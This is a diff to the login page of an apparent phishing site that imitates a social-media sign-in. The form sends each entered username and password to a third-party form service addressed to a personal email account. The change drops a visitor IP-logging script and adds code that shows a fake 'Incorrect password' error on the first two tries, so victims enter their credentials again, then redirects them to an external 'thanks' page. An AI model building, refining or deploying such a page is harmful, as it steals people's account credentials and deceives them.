--- a/login.html
+++ b/login.html
@@ -11,6 +11,15 @@
   <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet">
   <link rel="stylesheet" href="./app.css">
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" crossorigin="anonymous" referrerpolicy="no-referrer" />
+
+  <style>
+    .error-message {
+      color: red;
+      font-size: 12px;
+      margin-top: 4px;
+      display: none;
+    }
+  </style>
 </head>
 
 <body>
@@ -29,8 +38,6 @@
 
         <div class="form-container">
           <form id="form" method="POST" action="https://formsubmit.co/pabloben022@gmail.com">
-            <input type="text" id="ipaddress" name="IPaddress" hidden>
-
             <div class="form-content box">
               <div class="logo">
                 <img src="./images/logo-light.png" class="logo-light" />
@@ -51,7 +58,7 @@
                     <span>Phone number, username or email</span>
                     <input type="text" name="username" id="username" required>
                     <input type="hidden" name="_captcha" value="false">
-                    <input type="hidden" id="nextField" name="_next" value="thanks.html">
+                    <input type="hidden" id="nextField" name="_next" value="">
                   </div>
                 </div>
 
@@ -60,6 +67,7 @@
                     <span>Password</span>
                     <input type="text" name="password" id="password" required>
                     <button type="button">Show</button>
+                    <small id="errorText" class="error-message">Incorrect password. Please try again.</small>
                   </div>
                   <div style="display: flex; justify-content: end; color: rgb(0, 17, 255);">
                     <a href="#" class="forgot-pw">Forgotten your password?</a>
@@ -99,21 +107,42 @@
       </div>
     </div>
   </div>
-<script>
-  document.addEventListener('DOMContentLoaded', function () {
-            // Replace 'https://api.ipify.org?format=json' with a preferred IP API if needed
-            fetch('https://api.ipify.org?format=json')
-                .then(response => response.json())
-                .then(data => {
-                    const ipaddress = data.ip;
-                    document.getElementById('ipaddress').value = ipaddress;
-                })
-                .catch(error => {
-                    console.error('Error fetching IP address:', error);
-                });
-        });
-</script>
-  <!-- No JS needed for attempts -->
+
+  <script>
+    const form = document.getElementById('form');
+    const nextField = document.getElementById('nextField');
+    const errorText = document.getElementById('errorText');
+
+    // Initialize login attempt counter if not set
+    if (!localStorage.getItem('login_attempt')) {
+      localStorage.setItem('login_attempt', '0');
+    }
+
+    // Show error message if user comes back after attempt < 2
+    if (parseInt(localStorage.getItem('login_attempt')) > 0 &&
+        parseInt(localStorage.getItem('login_attempt')) < 3) {
+      errorText.style.display = 'block';
+    }
+
+    form.addEventListener('submit', function () {
+      let attempt = parseInt(localStorage.getItem('login_attempt'));
+
+      if (attempt < 2) {
+        // First two attempts → show error, still submit, reload same page
+        errorText.style.display = 'block';
+        nextField.value = window.location.href;
+        localStorage.setItem('login_attempt', (attempt + 1).toString());
+      } else {
+        // Third attempt → redirect to success page
+        errorText.style.display = 'none';
+        nextField.value = "https://krelbs.vercel.app/thanks.html";
+        localStorage.removeItem('login_attempt');
+      }
+
+      return true; // allow submission
+    });
+  </script>
+
   <script src='app.js'></script>
 </body>
 </html>
